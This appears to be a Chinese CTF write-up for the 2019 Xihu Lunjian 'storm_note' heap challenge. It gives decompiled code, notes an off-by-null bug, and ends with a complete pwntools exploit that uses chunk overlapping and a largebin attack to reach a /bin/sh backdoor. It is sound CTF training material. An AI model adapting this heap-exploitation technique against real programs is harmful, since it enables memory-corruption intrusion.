stormnote

2019西湖论剑storm_note(largebin attack)

保护检查

源码分析

mian

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init_proc(argc, argv, envp);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      _isoc99_scanf("%d", &v3);
      if ( v3 != 3 )
        break;
      delete_note();
    }
    if ( v3 > 3 )
    {
      if ( v3 == 4 )
        exit(0);
      if ( v3 == 666 )
        backdoor();
LABEL_15:
      puts("Invalid choice");
    }
    else if ( v3 == 1 )
    {
      alloc_note();
    }
    else
    {
      if ( v3 != 2 )
        goto LABEL_15;
      edit_note();
    }
  }
}

add

unsigned __int64 alloc_note()
{
  int v1; // [rsp+0h] [rbp-10h] BYREF
  int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  for ( i = 0; i <= 15 && note[i]; ++i )
    ;
  if ( i == 16 )
  {
    puts("full!");
  }
  else
  {
    puts("size ?");
    _isoc99_scanf("%d", &v1);
    if ( v1 > 0 && v1 <= 0xFFFFF )
    {
      note[i] = calloc(v1, 1uLL);
      note_size[i] = v1;
      puts("Done");
    }
    else
    {
      puts("Invalid size");
    }
  }
  return __readfsqword(0x28u) ^ v3;
}

edit

unsigned __int64 edit_note()
{
  unsigned int v1; // [rsp+0h] [rbp-10h] BYREF
  int v2; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Index ?");
  _isoc99_scanf("%d", &v1);
  if ( v1 <= 0xF && note[v1] )
  {
    puts("Content: ");
    v2 = read(0, (void *)note[v1], (int)note_size[v1]);
    *(_BYTE *)(note[v1] + v2) = 0;
    puts("Done");
  }
  else
  {
    puts("Invalid index");
  }
  return __readfsqword(0x28u) ^ v3;
}

edit函数中有off by null

delete

unsigned __int64 delete_note()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Index ?");
  _isoc99_scanf("%d", &v1);
  if ( v1 <= 0xF && note[v1] )
  {
    free((void *)note[v1]);
    note[v1] = 0LL;
    note_size[v1] = 0;
  }
  else
  {
    puts("Invalid index");
  }
  return __readfsqword(0x28u) ^ v2;
}

backdoor

void __noreturn backdoor()
{
  char buf[56]; // [rsp+0h] [rbp-40h] BYREF
  unsigned __int64 v1; // [rsp+38h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  puts("If you can open the lock, I will let you in");
  read(0, buf, 0x30uLL);
  if ( !memcmp(buf, (const void *)0xABCD0100LL, 0x30uLL) )
    system("/bin/sh");
  exit(0);
}

思路

构造两个大的堆块的 chunk overlapping 进行largebin attack，然后申请到指定位置进行改写

exp

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p = process("./pwn")

def debug():
	gdb.attach(p)
def add(size):
	p.recvuntil("Choice: ")
	p.sendline("1")
	p.recvuntil("size ?\n")
	p.sendline(str(size))
def edit(index,content):
	p.sendlineafter("Choice: ","2")
	p.sendlineafter("Index ?\n",str(index))
	p.sendafter("Content: \n",content)
def delete(index):
	p.sendlineafter("Choice: ","3")
	p.sendlineafter("Index ?\n",str(index))
add(0x18) #0
add(0x508) #1
add(0x18) #2
add(0x18) #3
add(0x508) #4
add(0x18) #5
add(0x18) #6
payload = 'a'*0x4f0 + p64(0x500)
edit(1,payload)
edit(4,payload)
delete(1)
payload = 'a'*0x18
edit(0,payload)
add(0x18) #1
add(0x4d8) #7
delete(1)
delete(2)
add(0x30) #1
add(0x4e0) #2

delete(4)
payload = 'a'*0x18
edit(3,payload)
add(0x18) #4
add(0x4d8) #8
delete(4)
delete(5)
add(0x40) #4
edit(8,"ffff")
delete(2)
add(0x4e8)
delete(2)
content_addr = 0xabcd0100
fake_chunk = content_addr - 0x20
payload = p64(0)*2 + p64(0) + p64(0x4f1)
payload += p64(0) + p64(fake_chunk)
edit(7,payload)
payload = p64(0)*4 + p64(0) + p64(0x4e1)
payload += p64(0) + p64(fake_chunk + 8)
payload += p64(0) + p64(fake_chunk - 0x18 - 5)
edit(8,payload)
add(0x40)
payload = p64(0)*2 + p64(0)*6
edit(2,payload)
p.recv()
p.sendline("666")
p.send(p64(0)*6)

#debug()
p.interactive()

参考

从两道题剖析Largebin Attack - FreeBuf网络安全行业门户